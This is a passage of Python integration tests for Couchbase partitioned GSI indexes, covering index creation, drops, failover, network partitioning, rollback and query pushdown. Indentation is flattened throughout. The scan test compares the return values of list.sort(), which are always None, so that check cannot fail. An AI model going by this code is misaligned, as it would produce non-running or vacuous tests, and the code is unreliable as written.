build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.start_firewall_on_node(node_out)
self.sleep(10)
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if not ("Index build will be retried in background" in str(ex) or "Terminate Request during cleanup" in str(ex)):
self.fail("index building failed with error : {0}".format(str(ex)))
else:
self.log.info("Index build failed with expected error")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(360)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_drop_partitioned_index(self):
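        """Create a partitioned index (optionally deferred and/or replicated),
        validate it, then drop it and confirm the index map is empty."""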
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
with_clause = "WITH {{'num_partition': {0} ".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_clause += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_clause += ", 'defer_build':True"
with_clause += " }"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI {0}".format(
with_clause)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details,
index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Drop index failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_delete_bucket_cascade_drop_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
with_clause = "WITH {{'num_partition': {0} ".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_clause += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_clause += ", 'defer_build':True"
with_clause += " }"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI {0}".format(
with_clause)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details,
index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
self.cluster.bucket_delete(server=self.master, bucket='default')
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_drop_partitioned_index_one_failed_node(self):
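        """Drop a partitioned index while one of its nodes is failed over, and
        optionally verify the drop remains clean after the node is recovered
        and rebalanced back in."""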
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Drop index failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
if self.recover_failed_node:
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(180)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_failover_during_drop_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(
str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
drop_index_query = "DROP INDEX `default`." + index_name_prefix
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query,
name="run_query",
args=(drop_index_query, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.async_failover, name="failover",
args=(
self.servers[:self.nodes_init], [node_out],
self.graceful)))
        # Start both threads before joining so the failover runs concurrently
        # with the DROP INDEX statement.
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_drop_partitioned_index_with_network_partitioning(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.start_firewall_on_node(node_out)
self.sleep(10)
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if not "the operation will automaticaly retry after cluster is back to normal" in str(ex):
self.fail(
"index drop failed with error : {0}".format(str(ex)))
else:
self.log.info("Index drop failed with expected error")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(360)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_partitioned_index_warmup_behaviour(self):
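        """Kill the indexer process on a node or reboot it, wait for warmup,
        and verify the partitioned index metadata is intact afterwards."""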
node_out = self.servers[self.node_out]
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI"
if self.defer_build:
create_index_query += " WITH {'defer_build':true}"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
remote_client = RemoteMachineShellConnection(node_out)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
remote_client.disconnect()
else:
self.reboot_node(node_out)
        # wait for restart and warmup on all nodes
        self.sleep(self.wait_timeout * 3)
        # disable firewall on this node
        self.stop_firewall_on_node(node_out)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_out], self,
wait_if_warmup=True)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After:")
self.log.info(index_metadata)
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index warmup behavior not as expected")
def test_mutations_on_partitioned_indexes(self):
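        """Run document mutations against partitioned indexes and check that
        the total indexed item count matches the bucket item count."""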
self.run_async_index_operations(operation_type="create_index")
self.run_doc_ops()
self.sleep(30)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes()
self.assertEqual(bucket_item_count, total_item_count,
"# Items indexed {0} do not match bucket items {1}".format(
total_item_count, bucket_item_count))
def test_update_mutations_on_indexed_keys_partitioned_indexes(self):
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(name) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.run_doc_ops()
self.sleep(30)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes(
index_name="idx1")
self.assertEqual(bucket_item_count, total_item_count,
"# Items indexed {0} do not match bucket items {1}".format(
total_item_count, bucket_item_count))
def test_kv_full_rollback_on_partitioned_indexes(self):
self.run_async_index_operations(operation_type="create_index")
self.sleep(30)
self.cluster.bucket_flush(self.master)
self.sleep(60)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes()
self.assertEqual(total_item_count, 0, "Rollback to zero fails")
def test_kv_partial_rollback_on_partitioned_indexes(self):
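        """Force a partial KV rollback (stop persistence on two nodes, mutate,
        kill memcached on the master, fail over the other node) and verify the
        partitioned indexes converge back to the bucket item count."""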
self.run_async_index_operations(operation_type="create_index")
# Stop Persistence on Node A & Node B
self.log.info("Stopping persistence on NodeA & NodeB")
mem_client = MemcachedClientHelper.direct_client(self.servers[0],
"default")
mem_client.stop_persistence()
mem_client = MemcachedClientHelper.direct_client(self.servers[1],
"default")
mem_client.stop_persistence()
self.run_doc_ops()
self.sleep(10)
# Get count before rollback
bucket_count_before_rollback, item_count_before_rollback, num_docs_processed_before_rollback = self.get_stats_for_partitioned_indexes()
# Kill memcached on Node A so that Node B becomes master
self.log.info("Kill Memcached process on NodeA")
shell = RemoteMachineShellConnection(self.master)
shell.kill_memcached()
# Start persistence on Node B
self.log.info("Starting persistence on NodeB")
mem_client = MemcachedClientHelper.direct_client(
self.input.servers[1], "default")
mem_client.start_persistence()
# Failover Node B
self.log.info("Failing over NodeB")
self.sleep(10)
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init], [self.servers[1]], self.graceful,
wait_for_pending=120)
failover_task.result()
# Wait for a couple of mins to allow rollback to complete
self.sleep(120)
# Get count after rollback
bucket_count_after_rollback, item_count_after_rollback, num_docs_processed_after_rollback = self.get_stats_for_partitioned_indexes()
self.assertEqual(bucket_count_after_rollback, item_count_after_rollback,
"Partial KV Rollback not processed by Partitioned indexes")
def test_scan_availability(self):
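        """Fail over an index node and verify scans still succeed when the
        index has replicas; without replicas only the expected error message
        is tolerated."""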
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=60)
failover_task.result()
self.sleep(30)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.num_index_replicas == 0:
if self.expected_err_msg in str(ex):
pass
else:
self.fail(
"Scan failed with unexpected error message".format(
str(ex)))
else:
self.fail("Scan failed")
def test_scan_availability_with_network_partitioning(self):
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Induce network partitioning on one of the nodes
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(
"Scan failed as one indexer node was experiencing network partititioning. Error : %s",
str(ex))
# Heal Network Partitioning
self.stop_firewall_on_node(node_out)
# Re-run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.num_index_replicas:
if self.expected_err_msg in str(ex):
pass
else:
self.fail(
"Scan failed with unexpected error message".format(
str(ex)))
else:
self.fail("Scan failed")
def test_index_scans(self):
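        """Compare results for a range of scan shapes (lookups, pagination,
        aggregation, large and sorted result sets, overlapping ranges) between
        partitioned and equivalent non-partitioned indexes."""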
self._load_emp_dataset(end=self.num_items)
# Create Partitioned and non-partitioned indexes
if self.num_index_partitions > 0:
self.rest.set_index_settings(
{"indexer.numPartitions": self.num_index_partitions})
create_partitioned_index1_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(name,dept,salary) USING GSI;"
create_index1_query = "CREATE INDEX non_partitioned_idx1 ON default(name,dept,salary) USING GSI;"
create_partitioned_index2_query = "create index partitioned_idx2 on default(name,manages.team_size) partition by hash(manages.team_size) USING GSI;"
create_index2_query = "create index non_partitioned_idx2 on default(name,manages.team_size) USING GSI;"
create_partitioned_index3_query = "create index partitioned_idx3 on default(name,manages.team_size) partition by hash(name,manages.team_size) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index1_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index1_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index2_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index2_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index3_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Scans
queries = []
# 1. Small lookup query with equality predicate on the partition key
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name='Safiya Palmer'"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 2. Pagination query with equality predicate on the partition key
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND dept='HR' offset 0 limit 10"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 3. Large aggregated query
query_details = {}
query_details[
"query"] = "select count(name), dept from default USE INDEX (indexname USING GSI) where name is not missing group by dept"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 4. Scan with large result sets
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 10000"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 5. Scan that does not require sorted data
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 100000"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 6. Scan that requires sorted data
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 10000 order by dept asc,salary desc"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 7. Scan with predicate on a dataset that has some values for the partition key missing, and present for some
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where name is not missing AND manages.team_size > 3"
query_details["partitioned_idx_name"] = "partitioned_idx2"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
# 8. Index partitioned on multiple keys. Scan with predicate on multiple keys with a dataset that has some values for the partition keys missing, and present for some
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where manages.team_size >= 3 and manages.team_size <= 7 and name like 'A%'"
query_details["partitioned_idx_name"] = "partitioned_idx3"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
# 9. Overlap scans on partition keys
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where name is not missing AND (manages.team_size >= 3 or manages.team_size >= 7)"
query_details["partitioned_idx_name"] = "partitioned_idx2"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
total_scans = 0
failures = 0
for query_details in queries:
total_scans += 1
try:
query_partitioned_index = query_details["query"].replace(
"indexname", query_details["partitioned_idx_name"])
query_non_partitioned_index = query_details["query"].replace(
"indexname", query_details["non_partitioned_idx_name"])
result_partitioned_index = \
self.n1ql_helper.run_cbq_query(
query=query_partitioned_index,
min_output_size=10000000,
server=self.n1ql_node)["results"]
result_non_partitioned_index = self.n1ql_helper.run_cbq_query(
query=query_non_partitioned_index, min_output_size=10000000,
server=self.n1ql_node)["results"]
self.log.info("Partitioned : {0}".format(
str(result_partitioned_index.sort())))
self.log.info("Non Partitioned : {0}".format(
str(result_non_partitioned_index.sort())))
if result_partitioned_index.sort() != result_non_partitioned_index.sort():
failures += 1
self.log.info(
"*** This query does not return same results for partitioned and non-partitioned indexes.")
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Total scans : {0}, Matching results : {1}, Non-matching results : {2}".format(
total_scans, total_scans - failures, failures))
self.assertEqual(failures, 0,
"Some scans did not yield the same results for partitioned index and non-partitioned indexes. Details above.")
def test_load_balancing_amongst_partitioned_index_replicas(self):
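        """Run the same query repeatedly against a partitioned index with
        replicas and check that every replica on every host served at least
        one request."""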
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(age) partition by hash (meta().id) USING GSI WITH {{'num_replica': {0},'num_partition':{1}}};".format(
self.num_index_replicas, self.num_index_partitions)
select_query = "SELECT count(age) from default"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.expected_err_msg not in str(ex):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
else:
self.log.info("Index creation failed as expected")
self.sleep(30)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
self.assertTrue(self.validate_partition_map(index_metadata, index_name_prefix,
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Run select query 100 times
for i in range(0, 100):
self.n1ql_helper.run_cbq_query(query=select_query,
server=self.n1ql_node)
index_stats = self.get_index_stats(perNode=True)
load_balanced = True
for i in range(0, self.num_index_replicas + 1):
if i == 0:
index_name = index_name_prefix
else:
index_name = index_name_prefix + " (replica {0})".format(str(i))
hosts, _ = self.n1ql_helper.get_index_details_using_index_name(
index_name, index_map)
for hostname in hosts:
num_request_served = index_stats[hostname]['default'][index_name][
"num_completed_requests"]
self.log.info("# Requests served by %s on %s = %s" % (
index_name, hostname, num_request_served))
if num_request_served == 0:
load_balanced = False
if not load_balanced:
self.fail("Load is not balanced amongst index replicas")
def test_indexer_pushdowns_multiscan(self):
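        """Verify via EXPLAIN that composite range predicates are pushed down
        to the partitioned index as multi-span scans."""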
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary > 120000 and salary < 150000"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary BETWEEN 120000 and 150000"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
explain_query3 = "EXPLAIN select name from default where name is not missing and dept='HR' and (salary > 120000 or salary > 180000)"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 3 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
def test_indexer_pushdowns_offset_limit(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary > 120000 and salary < 150000 OFFSET 10 LIMIT 10"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, limit_pushdown, offset_pushdown, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
offset=10, limit=10)
self.assertTrue(limit_pushdown & offset_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_projection(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
self.sleep(30)
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name,dept,salary from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1, 2])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
explain_query3 = "EXPLAIN select meta().id from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_sorting(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept,salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1}, {'keypos': 2}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
